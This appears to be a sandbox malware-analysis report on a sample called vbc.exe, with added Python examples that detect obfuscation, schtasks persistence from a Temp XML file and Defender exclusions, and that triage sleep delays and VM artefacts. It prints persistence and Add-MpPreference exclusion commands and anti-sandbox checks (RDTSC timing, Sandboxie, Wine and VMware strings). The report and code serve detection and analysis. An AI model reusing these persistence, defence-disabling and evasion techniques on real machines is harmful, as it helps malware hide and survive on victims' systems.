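    """Shannon entropy of `text` in bits per character (0.0 if empty)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def class_entropy(method_names):
    """Entropy of the class's method names concatenated, ignored names removed."""
    kept = [m for m in method_names if m not in IGNORED_NAMES]
    return shannon_entropy("".join(kept))


def flag_obfuscated(classes, threshold_bits=4.6, min_chars=32):
    """Return {class: entropy} for classes whose concatenated method names
    reach the threshold. Short concatenations are skipped: entropy is bounded
    by log2(length), so a handful of characters cannot score high anyway."""
    flagged = {}
    for cls, methods in classes.items():
        kept = "".join(m for m in methods if m not in IGNORED_NAMES)
        if len(kept) < min_chars:
            continue
        h = shannon_entropy(kept)
        if h >= threshold_bits:
            flagged[cls] = round(h, 2)
    return flagged


if __name__ == "__main__":
    for cls, methods in SAMPLE_CLASSES.items():
        print(f"{class_entropy(methods):.2f} bits/char  {cls}")
    print("flagged:", sorted(flag_obfuscated(SAMPLE_CLASSES)))
```

On this input the constructed readable class scores about 4.2 bits per character and the fully renamed class about 5.4; the mixed class (a few real names such as DataRead left among the renamed ones) still lands above 5. English-like identifiers reuse a small set of letters heavily, which is what pulls their entropy down; renamer output spreads evenly over upper case, lower case and digits.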

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
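The schtasks.exe command line above is the pattern the Sigma rule for task creation from a user's AppData\Temp path (listed in the signature overview) keys on: a task definition imported with /XML from a .tmp file in the user's Temp directory, by a parent running from the Desktop. The image path is SysWOW64 while the command line names System32 because the 32-bit parent goes through the file system redirector. The Python below is an added example, not part of the report, that turns that signature and the "Powershell Defender Exclusion" one (the Add-MpPreference -ExclusionPath fragment recovered from vbc.exe memory) into detection logic run over Sysmon-style process-creation events. Event 0's command line is the report's; the Defender exclusion target, the two benign decoy events, and the field names are constructed.

```python
import re

# Constructed Sysmon-style process-creation events. Event 0's command line is
# the schtasks line from this report; event 1 reuses the Add-MpPreference
# fragment recovered from vbc.exe memory with a constructed exclusion target.
# Events 2 and 3 are benign decoys.
EVENTS = [
    {
        "Image": r"C:\Windows\SysWOW64\schtasks.exe",
        "ParentImage": r"C:\Users\user\Desktop\vbc.exe",
        "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp"',
    },
    {
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\user\Desktop\vbc.exe",
        "CommandLine": r'powershell Add-MpPreference -ExclusionPath "C:\Users\user\Desktop"',
    },
    {
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r'schtasks.exe /Create /TN "Microsoft\Office\Update" /XML "C:\ProgramData\update.xml"',
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell Get-MpPreference",
    },
]

CREATE_RE = re.compile(r"(?:^|\s)/Create(?:\s|$)", re.IGNORECASE)
# /XML argument, quoted (may contain spaces) or bare (no spaces).
XML_ARG_RE = re.compile(r'/XML\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
USER_TEMP_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
MP_EXCLUSION_RE = re.compile(
    r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^[A-Z]:\\Users\\", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def task_from_user_temp(event):
    """schtasks.exe /Create importing its task XML from a user's Temp directory."""
    if basename(event["Image"]) != "schtasks.exe":
        return False
    cmd = event["CommandLine"]
    if not CREATE_RE.search(cmd):
        return False
    m = XML_ARG_RE.search(cmd)
    if not m:
        return False
    xml_path = m.group(1) or m.group(2)
    return bool(USER_TEMP_RE.search(xml_path))


def defender_exclusion(event):
    """PowerShell adding a Defender exclusion (path, process or extension)."""
    return (basename(event["Image"]) == "powershell.exe"
            and bool(MP_EXCLUSION_RE.search(event["CommandLine"])))


RULES = {
    "task_from_user_temp": task_from_user_temp,
    "defender_exclusion": defender_exclusion,
}


def evaluate(events):
    """Return (event index, rule name, parent runs from a user-writable path)
    for every event that trips a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                parent_user = bool(USER_WRITABLE_RE.match(ev["ParentImage"]))
                hits.append((idx, name, parent_user))
    return hits


if __name__ == "__main__":
    for idx, name, parent_user in evaluate(EVENTS):
        print(f"event {idx}: {name} (parent in user path: {parent_user})")
```

The parent-path flag is the enrichment that separates this sample's behaviour from a software installer doing the same thing from Program Files: a scheduled task and a Defender exclusion both requested by a binary on the user's Desktop is the combination worth paging on.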
Source: C:\Users\user\Desktop\vbc.exe | Process information set: NOOPENFILEERRORBOX (34 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (126 identical entries)
Source: C:\Windows\SysWOW64\help.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 0.2.vbc.exe.2aec108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 6420, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\vbc.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vbc.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000002B48604 second address: 0000000002B4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000002B4899E second address: 0000000002B489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vbc.exe TID: 6424 | Thread sleep time: -38500s >= -30000s
Source: C:\Users\user\Desktop\vbc.exe TID: 6464 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6808 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\help.exe TID: 6612 | Thread sleep time: -40000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_004088D0 rdtsc
Source: C:\Users\user\Desktop\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5311
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\vbc.exe | Thread delayed: delay time: 38500
Source: C:\Users\user\Desktop\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.277498776.0000000008CEA000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}froQQ
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000B.00000000.303948954.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.311106816.0000000008C73000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.292121937.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000000B.00000000.280486172.000000000ECF7000.00000004.00000001.sdmp | Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_004088D0 rdtsc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\vbc.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe | Process token adjusted: Debug
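Two things in the evasion rows above deserve decoding. The sleep rows print the delay as a negative number (the convention for a relative interval passed to NtDelayExecution) against a 30000 threshold, and the magnitudes line up with the unit-less "Thread delayed: delay time" rows (38500 in both), so the "s" suffix is best read as milliseconds. The value 922337203685477 is exactly (2^63 - 1) divided by 10^4, i.e. the largest signed 64-bit count of 100 ns ticks rendered in milliseconds: a sentinel for "wait indefinitely", not a timer the sample expects to expire. The other group is the memory strings (SBIEDLL.DLL for Sandboxie, wine_get_unix_file_name for Wine, the VMware Tools paths and SCSI device names) that the sample, or the explorer.exe it injected into, holds in memory. The Python below is an added example, not part of the report, that parses such sleep rows, classifies each delay as short, long or sentinel, and scans a list of memory strings for hypervisor and sandbox artefacts. The sleep rows and most strings are copied from the rows above; the indicator table and the one benign string are constructed.

```python
import re

# Sleep rows copied from this report's evasion section (the report's own
# rendering, including the "s" suffix), used here as the input sample.
SLEEP_ROWS = [
    r"C:\Users\user\Desktop\vbc.exe TID: 6424 Thread sleep time: -38500s >= -30000s",
    r"C:\Users\user\Desktop\vbc.exe TID: 6464 Thread sleep time: -922337203685477s >= -30000s",
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6808 Thread sleep time: -7378697629483816s >= -30000s",
    r"C:\Windows\SysWOW64\help.exe TID: 6612 Thread sleep time: -40000s >= -30000s",
]

# Strings recovered from process memory in the rows above, plus one benign
# constructed string so the scanner has something to ignore.
MEMORY_STRINGS = [
    "SBIEDLL.DLL",
    "KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME",
    "VMware SVGA II",
    "InstallPathJC:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\",
    "SOFTWARE\\VMware, Inc.\\VMware Tools",
    "Microsoft Print to PDF",  # constructed benign string
]

# Largest signed 64-bit value in 100 ns ticks, expressed in milliseconds.
# A delay at or above this is a sentinel (wait forever), not a real timer.
INT64_MAX_TICKS_AS_MS = (2**63 - 1) // 10_000

# Tolerates both "TID: 6424 Thread" and the fused "TID: 6424Thread" form.
ROW_RE = re.compile(
    r"^(?P<proc>.+?)\s+TID:\s*(?P<tid>\d+)\s*Thread sleep time:\s*"
    r"(?P<delay>-?\d+)s\s*>=\s*(?P<threshold>-?\d+)s"
)


def parse_sleep_row(row):
    """Return {process, tid, delay_ms, threshold_ms} or None if not a sleep row."""
    m = ROW_RE.search(row)
    if m is None:
        return None
    return {
        "process": m.group("proc").rsplit("\\", 1)[-1].lower(),
        "tid": int(m.group("tid")),
        "delay_ms": abs(int(m.group("delay"))),        # interval magnitude
        "threshold_ms": abs(int(m.group("threshold"))),
    }


def classify_delay(delay_ms, threshold_ms):
    if delay_ms >= INT64_MAX_TICKS_AS_MS:
        return "sentinel"
    if delay_ms >= threshold_ms:
        return "long"
    return "short"


def triage_sleeps(rows):
    """Parse every sleep row and attach its classification."""
    out = []
    for row in rows:
        rec = parse_sleep_row(row)
        if rec is None:
            continue
        rec["class"] = classify_delay(rec["delay_ms"], rec["threshold_ms"])
        out.append(rec)
    return out


# Substring -> product family. Assumed table; extend for the lab in use.
VM_INDICATORS = {
    "sbiedll.dll": "Sandboxie",
    "wine_get_unix_file_name": "Wine",
    "vmware": "VMware",
    "vbox": "VirtualBox",
    "qemu": "QEMU",
}


def scan_memory_strings(strings):
    """Map product family -> list of strings that mention it."""
    hits = {}
    for s in strings:
        low = s.lower()
        for needle, family in VM_INDICATORS.items():
            if needle in low:
                hits.setdefault(family, []).append(s)
    return hits


if __name__ == "__main__":
    for rec in triage_sleeps(SLEEP_ROWS):
        print(f"{rec['process']:<16} tid={rec['tid']:<5} {rec['class']:<8} {rec['delay_ms']}")
    for family, strings in sorted(scan_memory_strings(MEMORY_STRINGS).items()):
        print(f"{family}: {len(strings)} string(s)")
```

The sentinel class matters for triage: a sandbox that "accelerates" sleeps by shortening long timers will not wake a thread that asked for the maximum interval, so those threads are either waiting on a separate signal or are the hollowed host's idle threads, and they should not be read as the sample sleeping for ten thousand years to outlast the analysis window.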
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0181C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0182A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_018235A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_017FAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_018A8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h] (3 identical entries)
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h] (3 identical entries)
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h] (4 identical entries)
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01814120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01833D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01873540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01817D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01873884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01873884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h]
